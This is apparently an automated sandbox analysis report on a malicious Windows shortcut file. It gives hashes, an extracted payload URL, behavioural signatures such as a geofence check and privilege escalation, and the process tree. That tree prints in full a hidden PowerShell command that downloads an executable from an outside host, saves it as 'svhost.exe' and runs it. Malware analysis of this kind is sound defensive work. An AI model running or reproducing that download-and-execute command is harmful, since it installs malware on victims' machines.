Resubmissions
03-02-2023 01:45
230203-b6fmlshg33 1002-02-2023 21:18
230202-z5z7maba8z 1002-02-2023 21:02
230202-zvr39sah6z 10Analysis
-
max time kernel
1549s -
max time network
1528s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
02-02-2023 21:18
Static task
static1
Behavioral task
behavioral1
Sample
a517abf69af75cef34cc2db14981ea42b2ef4424c140e37363f80badb2353c6c.lnk
Resource
win10v2004-20221111-en
General
-
Target
a517abf69af75cef34cc2db14981ea42b2ef4424c140e37363f80badb2353c6c.lnk
-
Size
2KB
-
MD5
ef7f9739337bc657cd0a63e32e27d0a1
-
SHA1
bf67555a7272f24ceb57b1c49e4cf37dc17b246f
-
SHA256
a517abf69af75cef34cc2db14981ea42b2ef4424c140e37363f80badb2353c6c
-
SHA512
e3d0a14ac1b9165e75e619aa6f76058a4c799bb722abaeafac977c35f31ab10ad8c8a51c7f3828bb896cbf339f971974a4fb26421ba6aea52530ac84b7785ada
Malware Config
Extracted
https://oiartzunirratia.eus/install/clean/Lcovlccdxd.exe
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 17 4808 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 4808 powershell.exe 4808 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 4808 powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
cmd.exedescription pid process target process PID 1788 wrote to memory of 4808 1788 cmd.exe powershell.exe PID 1788 wrote to memory of 4808 1788 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\a517abf69af75cef34cc2db14981ea42b2ef4424c140e37363f80badb2353c6c.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://oiartzunirratia.eus/install/clean/Lcovlccdxd.exe','C:\Users\Admin\AppData\Roaming\svhost.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\svhost.exe'2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/4808-132-0x0000000000000000-mapping.dmp
-
memory/4808-133-0x0000024F6AB50000-0x0000024F6AB72000-memory.dmpFilesize
136KB
-
memory/4808-134-0x00007FFD37DA0000-0x00007FFD38861000-memory.dmpFilesize
10.8MB
-
memory/4808-135-0x00007FFD37DA0000-0x00007FFD38861000-memory.dmpFilesize
10.8MB
-
memory/4808-136-0x00007FFD37DA0000-0x00007FFD38861000-memory.dmpFilesize
10.8MB